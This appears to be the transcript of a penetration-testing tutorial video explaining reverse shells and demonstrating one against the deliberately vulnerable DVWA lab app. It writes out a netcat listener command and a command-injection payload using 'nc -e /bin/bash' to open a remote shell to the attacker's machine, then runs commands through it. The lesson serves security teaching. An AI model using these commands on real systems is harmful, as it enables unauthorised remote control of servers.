Hello people, welcome to Gurukula. I'm Jai. So today in this video we will be talking about how to establish a reverse shell connection with any web application by using an utility called Netcat. So without any further delay, let's get into the topic. If you are landing on this particular video directly, I would like to tell you that this is a series of lecture videos where we discuss on web application penetration testing and vulnerabilities present in the web application. So I will leave a link in the description box below so that you can check the complete playlist. So previously in our video we were talking about the command injection attack on the DVWA. So this video we are going to discuss on what is exactly the reverse shell connection is and how to establish a reverse shell connection with DVWA, especially by using an utility called Net. So what exactly is a reverse shell connection? So a reverse shell connection is a type of remote access technique which is used in penetration testing and ethical hacking, where a target machine initiates a connection back to the attacker's machine. Okay, let me just put it in a pictorial view so that we can able to understand it even better. Let us assume that we have target machine here. When I say target, it is a victim which machine is going to be affected by an attacker, and on the other side we have another machine. This is what actually the attacker is. We are expecting our target to establish a connection to the attacker's machine so that attacker can perform his attack. So how is it possible? Why would a target system will reach an attacker, or why would a target system will establish a connection to the attacker's machine so that allowing attacker to hack into the system? So let's make it very clear. The term lies in reverse shell. Why is it called as reverse shell? So actually there is something called as forward shell, where in forward shell what happens is the attacker directly connects to the target machine. So here usually what happens is attacker wants to connect to the target machine in order to perform the attack. Let it be any attack. So this is not possible in most of the cases because here the attacker is initiating the connection and then this is treated as inbound connection. So this is treated as inbound connection to the web server or web application, and usually this connection will be terminated by all the security protocols implemented here in this web application. So let us say if we have a firewall and your web application is behind the firewall. So if this is the firewall, your firewall is going to check all the inbound connections that is coming to this particular web application, and this firewall is going to drop this connection, and this is not going to be allowed. So the attacker will not stand a chance to get connected with the web server so that he cannot perform any attack. So that how can we get a connection? So that is where actually the reverse shell comes into the picture. So instead of attacker initiating the connection, why not target machine is initiating a connection to the attacker, so that attacker will have a separate channel to control the web application. This is possible because actually this is treated as outbound connection. So this is treated as outbound connection, and in most of the cases the firewalls will not filter any of the outbound connection because the connection is actually from the web application. So the firewalls will not block or drop all these connections. So somehow attacker should ask the target machine to get it connected to the attacker. So how can this be done? So this is what exactly what we call it as reverse shell. So how do we perform this? So first attacker has to set up a listening machine. So what first actually happens is first an attacker will set up a listener. So this listener will be present at one particular IP address and it is listening at a particular port address. So this can be done by several utilities present in the network like Netcat. You can use Netcat or you can use Metasploit, or several other applications are there. So first and foremost step is to set up a listener on a particular IP address and then the particular port address. And then the second one is payload execution. Listener is set up. We have the next step as payload execution. The attacker will exploit a particular vulnerability on the target machine to execute a payload. So this payload will actually contain the instructions for target machine to connect back to the attacker's machine. So this particular type of payload can be injected to the target's machine by several methods, either by using command injection, or sometimes we can use techniques like phishing, or sometimes we can use techniques like social engineering, or sometimes we can use file upload vulnerability. If the server or any web application is allowing us to upload a file, these files can be a script which actually initiates the reverse connection. Or sometimes we can use cross-site scripting attack, where we can execute scripts the reverse side, and it can be achieved by using malwares which actually establish a backdoor, and we can sometimes use trojans. So malwares, trojans, all these things are possible. And finally, if it is physically not secured well, you can use physical access as well, like injecting an USB, or you can directly access the machine and you can just establish a backdoor. So these are all the various attack vectors where an attacker will use to establish a reverse connection. So here in this particular video we will be seeing how to exploit the command injection. This is like a continuation of our previous video. So there are lots of attack vectors available present here. The attacker will choose any of this attack vector so as to deliver the payload. So once that is done, the next step is establishing the connection. So now the connection has been established. Now the attacker will have and direct access to the web server so that he can execute any command that he wish to execute in the web application. And finally he can gain control. By gaining the control, he can use lots of malicious activities like creating an user, escalating the privileges to the user, and what an attacker could do by just passing in commands, where we just discussed in detail in the previous video. So this is how it is being done. So now we will see how this can be done in practical scenarios. So here is our web application on the left, where I have just landed on command injection vulnerability page, and what you see on top is actually the attacker's listener. So this particular window is going to be acting as our attacker's listener, where I'm going to set up a listener over here by using a Netcat. And then you can see in another window at the bottom, this particular window is going to be acting as our actual Kali Linux terminal. So these are the three windows what we can see. So this is the first window, and this is the second window, and our web application will be our third window. So with that said, as likely we will have to establish the listener first. So how do we establish a listener? So the command is netcat hyphen lnvp. Port number can be 444, and then when I hit enter, it says that it is listening on port number 4444. So actually now the attacker has set up the listener. So when you look at this particular command, there are certain instructions where nc will actually triggers the netcat utility on the Linux command, and then hyphen L represents this is on the listen mode. So the utility is on the listen mode on port number 4444, and then N specifies that there is no DNS lookup is required for this particular connection, just to speed up the reverse connection, and V is actually for the verbose mode. So it is going to tell us what is happening in the NC utility, netcat utility, and finally P represents the port number. So here in our case the port number is 4444. So that is a basic explanation of the command. So now what we have to do is we will have to try to connect it. Now the attacker is listening, and somehow we need to make our web application to connect it over there. So the connection is usually 127.0.0.1, and then I am just using a command separator, and I am using a command nc hyphen e is to have an execution mode /bin/ bash. So I'm just executing a bash command, and now we need the IP address of that particular IP address of the machine where we wanted to connect. So we have to know the IP configuration. So I will just enter the ifconfig command over here just to find out what is the IP address. So here in our case the IP address is, as you can see on this particular window, our IP address is 10.02.15. So this is what the IP address which we have to put it over here. So 10.02 and 15, and followed by the port number. This time our port number is 4444. So if you have to look at the command explanation, I have just entered nc -e and then /bin/bash followed by the IP address of the attacker's machine. So this is the attacker machine's IP address, and followed by the port number. This port number should be what we have actually set it up in this listener over here. So once this is done, you can actually just submit this command, and now you can see that there is a connection that has been established from our web application. You can see that listening on port number 4444. So actually the web application is listening on port number 444, and now we have an reverse shell connection between these two terminals. So now what we can do is we can actually execute our commands from this reverse shell area so that we can able to know what is happening. So let me just type in the ls command, and then we can actually able to see what are all the files that is present over here, and then I can pass on the commands like this. So pwd present working directory, and this is where our web application has been hosted. If you are following our videos from the beginning, you might have known that we have actually configured this web application in this particular area. And also I can just get informations like who am I. So it's just going to tell over here www-data. So these are all the informations which I can get. I can keep on giving instructions, and I can play around all the instructions here, and I can go to any extent over there. So we can actually also try to check the IP address of this. So actually we can just check the IP address. So the IP address in this case, it is going to be the same because we have hosted this particular web application on the same machine. So for as of this demonstration is concerned, the Linux machine and then the DVWA is both hosted on the same physical machine. So that is why the IP addresses are same, but in real time scenarios you can give the IP address, and this works even if the web application and the listener machine is on the different network. So that is how the reverse shell connection will be established. So in this particular video we have spoke a lot about what exactly reverse shell connection is, and then we have actually demonstrated how to establish a reverse shell connection by using DVWA and then the Netcat. So coming up in the next video, we will talk a lot about cross-site request forgery, which is shortly called as CSRF. So I'm going to see you in the next video. Until then, it's bye from Jai and happy learning.